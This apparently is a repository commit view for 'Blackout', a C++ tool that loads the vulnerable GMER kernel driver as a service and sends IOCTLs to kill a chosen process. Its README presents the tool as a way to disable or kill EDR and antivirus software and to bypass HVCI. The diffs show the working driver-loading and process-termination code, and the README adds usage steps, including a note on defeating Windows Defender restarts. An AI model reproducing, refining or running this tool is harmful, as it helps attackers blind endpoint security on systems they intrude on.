14 Commits
Author SHA1 Message Date
V2 50dc20f50a Update Blackout.cpp 2023-06-02 01:39:14 +01:00
V2 e0c6aedfd4 Resolved loading driver error check issue 2023-06-02 01:26:07 +01:00
V2 4997529f7b Update Blackout.cpp 2023-05-31 15:33:04 +01:00
Йорлов aae0439161 Update Blackout.cpp 2023-05-28 16:23:17 +01:00
Йорлов fc721766ed Update Blackout.cpp 2023-05-27 16:35:44 +01:00
Йорлов 50827a5425 Update README.md 2023-05-26 16:40:57 +01:00
Йорлов 7d6af8c33a Update README.md 2023-05-26 12:34:29 +01:00
Йорлов 9ed4bae284 Update README.md 2023-05-26 01:35:39 +01:00
Йорлов 210c4a947f Update README.md 2023-05-26 01:35:25 +01:00
Йорлов 0fa505b1e5 Add files via upload 2023-05-26 01:35:04 +01:00
Йорлов 02339dee43 Create README.md 2023-05-26 01:34:22 +01:00
Йорлов 4dfd07825a Update README.md 2023-05-26 01:29:36 +01:00
Йорлов 0fedba898a Update README.md 2023-05-26 01:20:24 +01:00
Йорлов ec49f4d3f9 Update README.md 2023-05-26 01:18:22 +01:00
4 changed files with 65 additions and 36 deletions
+60 -35
View File
@@ -8,26 +8,58 @@
#define TERMINSTE_PROCESS_IOCTL_CODE 0x9876C094
int
BOOL
LoadDriver(
char* driverPath
)
)
{
SC_HANDLE hSCM, hService;
const char* serviceName = "Blackout";
// Open a handle to the SCM database
hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCM == NULL) {
printf("OpenSCManager failed %X\n", GetLastError());
return (-1);
return (1);
}
// Check if the service already exists
hService = OpenServiceA(hSCM, serviceName, SERVICE_ALL_ACCESS);
if (hService != NULL)
{
printf("Service already exists.\n");
// Start the service if it's not running
SERVICE_STATUS serviceStatus;
if (!QueryServiceStatus(hService, &serviceStatus))
{
CloseServiceHandle(hService);
CloseServiceHandle(hSCM);
return (1);
}
if (serviceStatus.dwCurrentState == SERVICE_STOPPED)
{
if (!StartServiceA(hService, 0, nullptr))
{
CloseServiceHandle(hService);
CloseServiceHandle(hSCM);
return (1);
}
printf("Starting service...\n");
}
CloseServiceHandle(hService);
CloseServiceHandle(hSCM);
return (0);
}
// Create the service
hService = CreateServiceA(
hSCM,
serviceName,
serviceName,
SERVICE_START | DELETE | SERVICE_STOP,
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
@@ -40,30 +72,30 @@ LoadDriver(
);
if (hService == NULL) {
if (GetLastError() == 1073)
{
StartServiceA(hService, 0, nullptr);
printf("starting service ..\n");
return (0);
}
else
printf("CreateService failed %X\n", GetLastError());
return (-1);
CloseServiceHandle(hSCM);
return (1);
}
printf("Service created successfully.\n");
StartServiceA(hService, 0, nullptr);
// Start the service
if (!StartServiceA(hService, 0, nullptr))
{
CloseServiceHandle(hService);
CloseServiceHandle(hSCM);
return (1);
}
printf("starting service ..\n");
printf("Starting service...\n");
CloseServiceHandle(hService);
CloseServiceHandle(hSCM);
return 0;
return (0);
}
BOOL
CheckProcess(
DWORD pn)
@@ -128,7 +160,7 @@ GetPID(
int
main(
int argc,
char **argv
char** argv
) {
if (argc != 3) {
@@ -146,8 +178,8 @@ main(
printf("provided process id doesnt exist !!\n");
return (-1);
}
WIN32_FIND_DATAA fileData;
HANDLE hFind;
char FullDriverPath[MAX_PATH];
@@ -163,7 +195,7 @@ main(
printf("path not found !!\n");
return(-1);
}
}
}
else {
printf("driver not found !!\n");
return(-1);
@@ -190,7 +222,7 @@ main(
DWORD output[2] = { 0 };
DWORD outputSize = sizeof(output);
BOOL result = DeviceIoControl(hDevice, INITIALIZE_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL);//0x9876C094
BOOL result = DeviceIoControl(hDevice, INITIALIZE_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL);
if (!result)
{
printf("faild to send initializing request %X !!\n", INITIALIZE_IOCTL_CODE);
@@ -208,7 +240,7 @@ main(
{
if (!DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL))
{
printf("DeviceIoControl failed. Error: %X !!\n",GetLastError());
printf("DeviceIoControl failed. Error: %X !!\n", GetLastError());
CloseHandle(hDevice);
return (-1);
}
@@ -224,26 +256,19 @@ main(
}
}
printf("terminating process !! \n");
result = DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL);
if (!result)
{
printf("DeviceIoControl failed. Error: %X !!\n", GetLastError());
CloseHandle(hDevice);
return (-1);
}
printf("terminating process !! \n");
if (!output){}
else
{
printf("error while terminating process !!\n");
printf("failed to terminate process: %X !!\n", GetLastError());
CloseHandle(hDevice);
return (-1);
}
printf("process has been terminated!\n");
system("pause");
CloseHandle(hDevice);
+4 -1
View File
@@ -1,9 +1,12 @@
# Blackout
* leveraging gmer driver to effectively disabling or killing EDRs and AVs.
* it bypass HVCI fluently
* the sample is sourced from loldrivers https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/
# usage
* Place the driver `Blackout.sys` in the same path as the executable
* The executable should be run in the context of an administrator
* Blackout.exe -p <process_id>
* for windows defender keep the program running to prevent the service from restarting it
Binary file not shown.
+1
View File
@@ -0,0 +1 @@
* Place the driver in the same path as the executable